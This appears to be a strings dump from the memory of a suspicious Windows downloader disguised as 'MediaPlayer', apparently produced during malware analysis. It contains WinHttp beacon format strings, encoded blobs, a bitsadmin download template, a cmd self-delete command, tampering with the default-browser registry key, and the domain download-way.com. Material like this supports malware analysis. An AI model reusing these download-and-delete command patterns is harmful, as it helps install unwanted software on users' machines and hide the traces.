119 52 113 94
@mscoree.dll
@mscoree.dll
- CRT not initialized
- CRT not initialized
- Attempt to initialize the CRT more than once.
- Attempt to initialize the CRT more than once.
- floating point support not loaded
- floating point support not loaded
kernel32.dll
kernel32.dll
USER32.DLL
USER32.DLL
C:\DOCUME~1\"%CurrentUserName%"\LOCALS~1\Temp\MediaPlayer__15159_il35679.exe
C:\DOCUME~1\"%CurrentUserName%"\LOCALS~1\Temp\MediaPlayer__15159_il35679.exe
MediaPlayer__15159_il35679.exe_1884_rwx_00B20000_0008C000:
.text
.text
`.rdata
`.rdata
@.data
@.data
.rsrc
.rsrc
@.reloc
@.reloc
j5SSh
j5SSh
8%uEP3
8%uEP3
PSShd'
PSShd'
xSSSh
xSSSh
FTPjKS
FTPjKS
FtPj;S
FtPj;S
C.PjRV
C.PjRV
Visual C CRT: Not enough memory to complete call to strerror.
Visual C CRT: Not enough memory to complete call to strerror.
Broken pipe
Broken pipe
Inappropriate I/O control operation
Inappropriate I/O control operation
Operation not permitted
Operation not permitted
portuguese-brazilian
portuguese-brazilian
operator
operator
GetProcessWindowStation
GetProcessWindowStation
WinHttpSetStatusCallback
WinHttpSetStatusCallback
Failed to get the Temp folder: %d
Failed to get the Temp folder: %d
RegOpenKeyTransactedW
RegOpenKeyTransactedW
RegCreateKeyTransactedW
RegCreateKeyTransactedW
RegDeleteKeyTransactedW
RegDeleteKeyTransactedW
RegDeleteKeyExW
RegDeleteKeyExW
2Ub46wAG7ILlcuNK7PAECPiT5WjjR/rwABTCpMxN Ezw6yEC7JTQUOR12 cHC/GV3E3Wevb6Gwu odZT7kzs7A==
2Ub46wAG7ILlcuNK7PAECPiT5WjjR/rwABTCpMxN Ezw6yEC7JTQUOR12 cHC/GV3E3Wevb6Gwu odZT7kzs7A==
w1ra8xAl65PNUORq9voUDPuD
w1ra8xAl65PNUORq9voUDPuD
2Uzw zML a7NWudk wEBvmC7g==
2Uzw zML a7NWudk wEBvmC7g==
xkbx9B4J cffUPgJ7u0YBPuUylr5CertEgK iN8fr02kvwcG7ILXS/kJ7fYNAr7C3ROqWfvxEw7wgJlM41P7v1IDlA==
xkbx9B4J cffUPgJ7u0YBPuUylr5CertEgK iN8fr02kvwcG7ILXS/kJ7fYNAr7C3ROqWfvxEw7wgJlM41P7v1IDlA==
CInstallationManager::IsPartOfInstallation value=%s
CInstallationManager::IsPartOfInstallation value=%s
CInstallationManager::SetComponentInstallationEnded %S
CInstallationManager::SetComponentInstallationEnded %S
%Y-%m-%d %H:%M:%S
%Y-%m-%d %H:%M:%S
CProgressUpdateRequest::CreateInstance %S
CProgressUpdateRequest::CreateInstance %S
CProgressUpdateRequest::ProgressUpdate %S
CProgressUpdateRequest::ProgressUpdate %S
Send progress update request %s
Send progress update request %s
Progress Request for '%S' return %s
Progress Request for '%S' return %s
yX3/7Bw0/Y/cW/9F 9cWCfqL3E2wE93tEgbqgvBR V3/8xsz/5TSH8xI9/NXE/HH2FvuCertHgD5gssFqgzmlQ==
yX3/7Bw0/Y/cW/9F 9cWCfqL3E2wE93tEgbqgvBR V3/8xsz/5TSH8xI9/NXE/HH2FvuCertHgD5gssFqgzmlQ==
VERSION.dll
VERSION.dll
KERNEL32.dll
KERNEL32.dll
USER32.dll
USER32.dll
GDI32.dll
GDI32.dll
RegDeleteKeyW
RegDeleteKeyW
RegCloseKey
RegCloseKey
RegQueryInfoKeyW
RegQueryInfoKeyW
RegEnumKeyExW
RegEnumKeyExW
RegOpenKeyExW
RegOpenKeyExW
RegCreateKeyExW
RegCreateKeyExW
ADVAPI32.dll
ADVAPI32.dll
SHELL32.dll
SHELL32.dll
ole32.dll
ole32.dll
OLEAUT32.dll
OLEAUT32.dll
Secur32.dll
Secur32.dll
WinHttpCloseHandle
WinHttpCloseHandle
WinHttpOpen
WinHttpOpen
WinHttpSetOption
WinHttpSetOption
WinHttpGetProxyForUrl
WinHttpGetProxyForUrl
WinHttpCrackUrl
WinHttpCrackUrl
WinHttpConnect
WinHttpConnect
WinHttpOpenRequest
WinHttpOpenRequest
WinHttpSetStatusCallback
WinHttpSetStatusCallback
WinHttpSendRequest
WinHttpSendRequest
WinHttpQueryHeaders
WinHttpQueryHeaders
WinHttpQueryDataAvailable
WinHttpQueryDataAvailable
WinHttpReadData
WinHttpReadData
WinHttpReceiveResponse
WinHttpReceiveResponse
WINHTTP.dll
WINHTTP.dll
GetProcessHeap
GetProcessHeap
GetCPInfo
GetCPInfo
zcÃ
zcÃ
.?AVAsyncWinHttp@@
.?AVAsyncWinHttp@@
.?AV?$_IDispEventLocator@$0MJ@$1?DIID_DWebBrowserEvents2@@3U_GUID@@B@ATL@@
.?AV?$_IDispEventLocator@$0MJ@$1?DIID_DWebBrowserEvents2@@3U_GUID@@B@ATL@@
.?AV?$IDispEventSimpleImpl@$0MJ@VCBoot@@$1?DIID_DWebBrowserEvents2@@3U_GUID@@B@ATL@@
.?AV?$IDispEventSimpleImpl@$0MJ@VCBoot@@$1?DIID_DWebBrowserEvents2@@3U_GUID@@B@ATL@@
.?AUISupportErrorInfo@@
.?AUISupportErrorInfo@@
.?AV?$CAtlExeModuleT@VCBootStrapperModule@@@ATL@@
.?AV?$CAtlExeModuleT@VCBootStrapperModule@@@ATL@@
?456789:;
?456789:;
!"#$%&'()* ,-./0123
!"#$%&'()* ,-./0123
cousins.epoxied.1 = s 'Inst Class'
cousins.epoxied.1 = s 'Inst Class'
CLSID = s '{d1b1dc80-beb9-49f1-9a4a-ec9b3dc45143}'
CLSID = s '{d1b1dc80-beb9-49f1-9a4a-ec9b3dc45143}'
cousins.epoxied = s 'Inst Class'
cousins.epoxied = s 'Inst Class'
CurVer = s 'cousins.epoxied.1'
CurVer = s 'cousins.epoxied.1'
ForceRemove {d1b1dc80-beb9-49f1-9a4a-ec9b3dc45143} = s 'Inst Class'
ForceRemove {d1b1dc80-beb9-49f1-9a4a-ec9b3dc45143} = s 'Inst Class'
ProgID = s 'cousins.epoxied.1'
ProgID = s 'cousins.epoxied.1'
VersionIndependentProgID = s 'cousins.epoxied'
VersionIndependentProgID = s 'cousins.epoxied'
val ServerExecutable = s '%MODULE_RAW%'
val ServerExecutable = s '%MODULE_RAW%'
TypeLib = s '{0fa5e38b-eb27-4a51-aa61-a0baf2bfc090}'
TypeLib = s '{0fa5e38b-eb27-4a51-aa61-a0baf2bfc090}'
.sssh
.sssh
REÚ
REÚ
\.crr
\.crr
s1f-'
s1f-'
.DC l
.DC l
tweb
tweb
type="win32" name="Microsoft.Windows.Common-Controls" version="6.0.0.0" processorArchitecture="*" publicKeyToken="6595b64144ccf1df" language="*" />
type="win32" name="Microsoft.Windows.Common-Controls" version="6.0.0.0" processorArchitecture="*" publicKeyToken="6595b64144ccf1df" language="*" />
stdole2.tlbWWW(
stdole2.tlbWWW(
msgWd
msgWd
keyNameW
keyNameW
urlW
urlW
url2d
url2d
YtcmdLineW
YtcmdLineW
P%CreateIconWW
P%CreateIconWW
iconUrlW
iconUrlW
regKeyWW
regKeyWW
CheckRegKeyW
CheckRegKeyW
keyWd
keyWd
W.launchCommandLineWWW
W.launchCommandLineWWW
~cmdW
~cmdW
WDIsShortNameInstalled
WDIsShortNameInstalled
Created by MIDL version 7.00.0555 at Wed Dec 09 15:16:39 2015
Created by MIDL version 7.00.0555 at Wed Dec 09 15:16:39 2015
00I0Y0v0
00I0Y0v0
0*0*12181
0*0*12181
)01070>0
)01070>0
? ?(?0?8?
? ?(?0?8?
9 9
9 9
mscoree.dll
mscoree.dll
- Attempt to initialize the CRT more than once.
- Attempt to initialize the CRT more than once.
- CRT not initialized
- CRT not initialized
- floating point support not loaded
- floating point support not loaded
wKERNEL32.DLL
wKERNEL32.DLL
WUSER32.DLL
WUSER32.DLL
Winhttp.dll
Winhttp.dll
Content-Type: application/x-www-form-urlencoded
Content-Type: application/x-www-form-urlencoded
shlwapi.dll
shlwapi.dll
HKEY_CURRENT_CONFIG
HKEY_CURRENT_CONFIG
HKEY_DYN_DATA
HKEY_DYN_DATA
HKEY_PERFORMANCE_DATA
HKEY_PERFORMANCE_DATA
HKEY_USERS
HKEY_USERS
HKEY_LOCAL_MACHINE
HKEY_LOCAL_MACHINE
HKEY_CURRENT_USER
HKEY_CURRENT_USER
HKEY_CLASSES_ROOT
HKEY_CLASSES_ROOT
appimageurl
appimageurl
cmdl
cmdl
capp=%s&cid=%s&mhx=%S&base=%s
capp=%s&cid=%s&mhx=%S&base=%s
\bitsadmin.exe
\bitsadmin.exe
\Support Tools\bitsadmin.exe
\Support Tools\bitsadmin.exe
%sami%s%d%d.exe
%sami%s%d%d.exe
%d-%.2d-%.2dT%.2d:%.2d:00
%d-%.2d-%.2dT%.2d:%.2d:00
%d-%.2d-%.2dT%.2d:-:00
%d-%.2d-%.2dT%.2d:-:00
/retrynav %d
/retrynav %d
Advapi32.dll
Advapi32.dll
shell32.dll
shell32.dll
{23A96663-59D1-4C44-A0DB-1118D9C4ABBA}
{23A96663-59D1-4C44-A0DB-1118D9C4ABBA}
OLEAUT32.DLL
OLEAUT32.DLL
kernel32.dll
kernel32.dll
sn=%s&hx=%S&base=%s
sn=%s&hx=%S&base=%s
advapi32.dll
advapi32.dll
v2.0.50727
v2.0.50727
v1.1.4322
v1.1.4322
Software\Microsoft\Windows\Shell\Associations\UrlAssociations\http\UserChoice
Software\Microsoft\Windows\Shell\Associations\UrlAssociations\http\UserChoice
%ProgramFiles%\Microsoft Silverlight\sllauncher.exe
%ProgramFiles%\Microsoft Silverlight\sllauncher.exe
%ProgramW6432%\Microsoft Silverlight\sllauncher.exe
%ProgramW6432%\Microsoft Silverlight\sllauncher.exe
NT%d.%dSP%d
NT%d.%dSP%d
%ProgramFiles%\Mozilla Firefox\firefox.exe
%ProgramFiles%\Mozilla Firefox\firefox.exe
%d.%d.%d.%d
%d.%d.%d.%d
ami%sExd
ami%sExd
bitsadmin /transfer amijob /download /priority high %s %s
bitsadmin /transfer amijob /download /priority high %s %s
ami%sExi
ami%sExi
/c del "%s"
/c del "%s"
cmd.exe
cmd.exe
%TEMP%\task.vbs
%TEMP%\task.vbs
ami%sExdel
ami%sExdel
OleAut32.dll
OleAut32.dll
C:\DOCUME~1\"%CurrentUserName%"\LOCALS~1\Temp\MediaPlayer__15159_il35679.exe
C:\DOCUME~1\"%CurrentUserName%"\LOCALS~1\Temp\MediaPlayer__15159_il35679.exe
{8856F961-340A-11D0-A96B-00C04FD705A2}
{8856F961-340A-11D0-A96B-00C04FD705A2}
1.1.5.55
1.1.5.55
setup.exe
setup.exe
download-way.com
download-way.com